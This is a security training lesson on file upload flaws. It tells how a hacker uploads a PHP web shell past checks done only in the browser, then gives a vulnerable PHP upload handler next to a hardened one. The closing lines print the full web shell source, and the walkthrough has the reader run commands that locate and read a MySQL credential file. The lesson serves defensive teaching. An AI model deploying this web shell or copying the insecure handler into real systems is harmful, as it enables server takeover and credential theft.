File Upload Vulnerabilities
Mal is a hacker who has signed up for a website running on a popular content management system.
He has noticed two things about the site's profile image upload function.
Firstly, uploaded files are not renamed as part of the upload process: the original file name, extension included, appears in the URL of the profile image once it is published.
Secondly, file-type checking is done only in JavaScript, in the browser. Nothing on the server validates what was actually uploaded.
Mal writes a simple script called hack.php. When PHP executes this web shell, it runs any command passed in the "cmd" parameter and returns the command's output.
He disables JavaScript in his browser and uploads hack.php as his profile image. Because the only check ran in the browser, the upload is accepted as-is. (He could equally have sent the request with a proxy or curl; a client-side check is a usability feature, not a security control.)
Unsurprisingly, his profile looks broken: the file he uploaded is not a valid image. However, the script now lives on the server, at a predictable URL that ends in ".php".
Requesting the URL of the "profile image" directly causes the web server to hand hack.php to the PHP interpreter instead of serving it as a static file, so the script is executed.
From then on, any command passed in the "cmd" parameter is executed on the server, with the privileges of the web server process. His upload has created a command execution vulnerability.
Help Mal get access to sensitive data on the server. Pass the command "locate my.cnf" in the "cmd" parameter to find the database config file.
Good job! Now pass "cat /etc/mysql/my.cnf" in the "cmd" parameter to read the file and discover the database password.
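The two flaws Mal exploited (original file name kept, type checked only in the browser) are both server-side decisions. The following is an added example, not the lesson's code or the CMS's code, showing the vulnerable handler next to a hardened one. It assumes a form field named "avatar" and an upload directory "/var/www/uploads"; both names are hypothetical, and the directory is assumed to be served as static files only (see the note after the code).

```php
<?php
// Added example, not part of the lesson. Assumes a form field "avatar" and an
// upload directory that the web server never hands to the PHP interpreter.
declare(strict_types=1);

const MAX_BYTES = 2 * 1024 * 1024;  // 2 MiB cap on profile images
// MIME type sniffed from the file's bytes => extension the server assigns.
const ALLOWED_IMAGE_TYPES = [
    'image/png'  => 'png',
    'image/jpeg' => 'jpg',
    'image/gif'  => 'gif',
];

// The pattern the lesson describes (do NOT use): no server-side type check,
// and the client's file name is kept, so "hack.php" stays "hack.php".
function storeProfileImageInsecure(array $file, string $uploadDir): string
{
    $dest = $uploadDir . '/' . basename($file['name']);
    move_uploaded_file($file['tmp_name'], $dest);
    return $dest;
}

// Hardened version. Nothing the client sent is trusted: the type comes from
// the bytes, the stored name is random, and the extension comes from our list.
function storeProfileImage(array $file, string $uploadDir): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    if (!is_uploaded_file($file['tmp_name'])) {   // must belong to this request
        throw new RuntimeException('not an uploaded file');
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }

    // Sniff the type from the content. $file['type'] and the extension of
    // $file['name'] are both client-controlled and are ignored.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if (!isset(ALLOWED_IMAGE_TYPES[$mime])) {
        throw new RuntimeException("rejected content type: $mime");
    }
    // It must also decode as an image; a bare "<?php ..." file fails here.
    if (@getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('not a decodable image');
    }

    // Server-chosen random name. The original name never reaches a URL, and
    // the extension can only ever be one of png/jpg/gif.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED_IMAGE_TYPES[$mime];
    $dest = rtrim($uploadDir, '/') . '/' . $name;

    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0644);  // readable by the web server, never executable
    return $dest;
}

// Usage from the profile form handler (field and directory names assumed).
try {
    $stored = storeProfileImage($_FILES['avatar'] ?? [], '/var/www/uploads');
    echo 'stored as ' . htmlspecialchars(basename($stored));
} catch (RuntimeException $e) {
    http_response_code(400);
    echo 'upload rejected';
}
```

Two caveats. First, an image can be a polyglot (a valid GIF or JPEG with PHP code in its comment section), and getimagesize will happily accept it; what keeps such a file harmless is that the server assigns the name and extension, so PHP is never asked to run it. Second, renaming is defence in depth, not the whole fix: the upload directory itself must be configured to serve static files only (for Apache with mod_php, "php_admin_flag engine off" in the Directory block for it; for nginx, a location block with no fastcgi pass), or better, stored outside the web root and served through a handler that sets Content-Type from the stored extension.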
<?php
  // Web shell: runs whatever the request passes in "cmd" through the system shell.
  // $_REQUEST means the command can arrive in the query string, the POST body or a cookie.
  if(isset($_REQUEST['cmd'])) {
    $cmd = $_REQUEST['cmd'];
    system($cmd);   // the command's output is written straight into the HTTP response
  } else {
    echo "What is your bidding?";
  }
?>
A simple web shell. Once the server hands this file to PHP, it runs any command passed in the "cmd" parameter and returns the command's output in the response.